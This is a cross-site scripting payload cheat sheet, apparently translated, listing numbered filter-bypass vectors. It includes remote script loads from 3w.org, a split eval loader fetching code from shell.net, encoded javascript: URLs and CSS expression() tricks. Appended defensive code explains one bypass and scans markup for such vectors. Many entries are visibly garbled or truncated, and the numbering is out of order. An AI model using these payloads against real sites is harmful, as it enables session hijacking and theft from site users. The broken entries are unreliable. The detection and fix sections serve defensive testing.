(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-ups (click-triggered handlers and tag-name tricks)
<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using a JavaScript directive
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no quotes and no semicolon
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab, splitting the javascript: keyword
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the javascript: keyword
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Getting around a character limit (requires all fragments on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null characters are basically useless in China, because there is nowhere to exploit them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes
\";alert('XSS');//
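Why entry (29) works, as an added example that is not part of the original page: a server-side template that only backslash-escapes the double quote turns the attacker's `\"` into `\\"`, where the doubled backslash is read as an escaped backslash and the quote then closes the string literal. The function names and the sandboxed `execute()` runner below are this example's own; the hardened version uses JSON.stringify plus `<` encoding, which is one standard fix rather than anything the page prescribes.

```javascript
// Added example, not from the original page: the "escaping JavaScript
// escapes" bypass against a template that only escapes double quotes,
// beside the fix. Function names are this example's own.

// Vulnerable: escapes the quote but not the backslash. Input \" becomes
// \\" , which the JS parser reads as an escaped backslash followed by the
// quote that ends the string literal.
function naiveQuoteEscape(s) {
  return s.replace(/"/g, '\\"');
}

function renderNaive(userInput) {
  return `var name = "${naiveQuoteEscape(userInput)}";`;
}

// Hardened: JSON.stringify escapes backslash, quote and control characters
// for a JS string literal; '<' is then encoded so the literal can never
// contain "</script>" and end the script element early.
function renderSafe(userInput) {
  const literal = JSON.stringify(userInput).replace(/</g, "\\u003c");
  return `var name = ${literal};`;
}

// Run a rendered snippet with alert() replaced by a recorder, returning the
// value the page ended up with and whatever alert() received.
function execute(snippet) {
  const alerts = [];
  const run = new Function("alert", `${snippet}\nreturn name;`);
  const name = run((x) => alerts.push(String(x)));
  return { name, alerts };
}

// Constructed attacker input: the page's entry (29).
const PAYLOAD = "\\\";alert('XSS');//";
console.log(renderNaive(PAYLOAD));                  // var name = "\\";alert('XSS');//";
console.log(execute(renderNaive(PAYLOAD)).alerts);  // [ 'XSS' ]
console.log(execute(renderSafe(PAYLOAD)).alerts);   // []
```

The naive rendering ends up with `name` equal to a single backslash and the injected `alert` executed; the JSON-based rendering returns the payload unchanged as a string and runs nothing else.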
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC=\'#\'" /span>

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC=\'#\'" /span>

(35) IMG LOWSRC
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) Style sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META refresh URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC=\'#\'" /IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
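Most entries above (the encoding and whitespace tricks in (3) to (19), the separator tricks in (20) to (22), the META refresh in (41) and the CSS entries (39) and (46) to (53)) work by getting a `javascript:` URL or an `expression()` past a filter that compares strings before the browser has normalised them. The scanner below is an added example, not part of the original cheat sheet: it performs that normalisation first (HTML character references with the semicolon optional, leading C0 controls, embedded tab/LF/CR/NUL, case folding, CSS comment removal) and then checks URL attributes, `on*` handlers, `style` attributes, `<style>` bodies and META refresh targets. It is a detection aid for a test suite or log review, not an HTML sanitizer, and its regex-based tag walking is deliberately lenient rather than a full HTML5 tokenizer. All markup it is run on is constructed for the example; 3w.org is the host the page itself uses.

```javascript
// Added example, not from the original cheat sheet: normalise values the
// way a lenient browser does, then look for script-bearing URLs and CSS.
// Detection aid only; not a sanitizer. All sample markup is constructed.

const SCRIPT_SCHEMES = ["javascript:", "vbscript:"];
// Attributes whose value is fetched or navigated as a URL.
const URL_ATTRS = new Set(["src", "href", "background", "dynsrc", "lowsrc", "action"]);

// Decode HTML character references: decimal (&#106;), zero-padded decimal
// (&#0000106), hex (&#x6A;) and a few named ones. The trailing ';' is
// optional, which is what the "without semicolons" entries rely on.
function decodeCharRefs(s) {
  const named = { lt: "<", gt: ">", quot: '"', amp: "&", apos: "'" };
  return s.replace(
    /&(?:#x([0-9a-f]+)|#(\d+)|(lt|gt|quot|amp|apos));?/gi,
    (match, hex, dec, name) => {
      if (name !== undefined) return named[name.toLowerCase()];
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp > 0x10ffff ? "\ufffd" : String.fromCodePoint(cp);
    },
  );
}

// Canonicalise a URL value: decode references, drop leading/trailing C0
// controls and spaces, remove tab/LF/CR anywhere (the URL parser does this,
// which is what the embedded tab/newline/CR entries exploit) and, to stay
// conservative about old IE, drop NUL bytes too. Then case-fold.
function canonicalizeUrl(value) {
  return decodeCharRefs(value)
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, "")
    .replace(/[\t\n\r\x00]/g, "")
    .toLowerCase();
}

function isScriptUrl(value) {
  const v = canonicalizeUrl(value);
  return SCRIPT_SCHEMES.some((scheme) => v.startsWith(scheme));
}

// CSS: strip comments first (the expr/*XSS*/ession split), then look for
// url(javascript:...) and the old IE expression() hook.
function cssHasScript(css) {
  const clean = css.replace(/\/\*[\s\S]*?\*\//g, "");
  if (/expression\s*\(/i.test(clean)) return true;
  const urlRe = /url\(\s*(?:"([^"]*)"|'([^']*)'|([^)]*))\s*\)/gi;
  let m;
  while ((m = urlRe.exec(clean)) !== null) {
    if (isScriptUrl(m[1] ?? m[2] ?? m[3])) return true;
  }
  return false;
}

// Walk every start tag and report attribute-level vectors. Tag and attribute
// names stop at whitespace, '/', '=' or '>' as in the HTML tokenizer, so
// <SCRIPT/XSS SRC=...> still yields a src attribute and <XSS=" onclick=...>
// still yields an onclick handler.
function findScriptVectors(html) {
  const findings = [];
  const tagRe = /<([a-z][^\s\/>]*)([^>]*)>/gi;
  const attrRe = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+)))?/g;
  let t;
  while ((t = tagRe.exec(html)) !== null) {
    const tag = t[1].toLowerCase();
    if (tag === "script") findings.push("script element");
    let a;
    attrRe.lastIndex = 0;
    while ((a = attrRe.exec(t[2])) !== null) {
      const name = a[1].toLowerCase();
      const value = a[2] ?? a[3] ?? a[4] ?? "";
      if (name.startsWith("on")) {
        findings.push(`${tag}@${name}: event handler`);
      } else if (URL_ATTRS.has(name) && isScriptUrl(value)) {
        findings.push(`${tag}@${name}: script URL`);
      } else if (name === "style" && cssHasScript(value)) {
        findings.push(`${tag}@style: css script`);
      } else if (tag === "meta" && name === "content" &&
                 value.split(/url\s*=/i).slice(1).some(isScriptUrl)) {
        findings.push("meta@content: script URL");
      }
    }
  }
  // <style> bodies (list-style-image, background-image, background entries).
  const styleRe = /<style[^>]*>([\s\S]*?)<\/style>/gi;
  let s;
  while ((s = styleRe.exec(html)) !== null) {
    if (cssHasScript(s[1])) findings.push("style element: css script");
  }
  return findings;
}

// Constructed sample run: two payloads from the cheat sheet and one benign tag.
const SAMPLE = `<IMG SRC=JaVaScRiPt:alert('XSS')>` +
  `<IMG SRC="jav&#x09;ascript:alert('XSS');">` +
  `<a href="https://example.org/">ok</a>`;
console.log(findScriptVectors(SAMPLE)); // [ 'img@src: script URL', 'img@src: script URL' ]
```

The ordering matters: decoding references before stripping whitespace is what catches `jav&#x09;ascript:`, and stripping CSS comments before matching `expression(` is what catches entry (49). A real sanitizer should instead parse the document with a proper HTML parser and allow-list attributes and schemes; this scanner is only for proving that a given filter bypass is present.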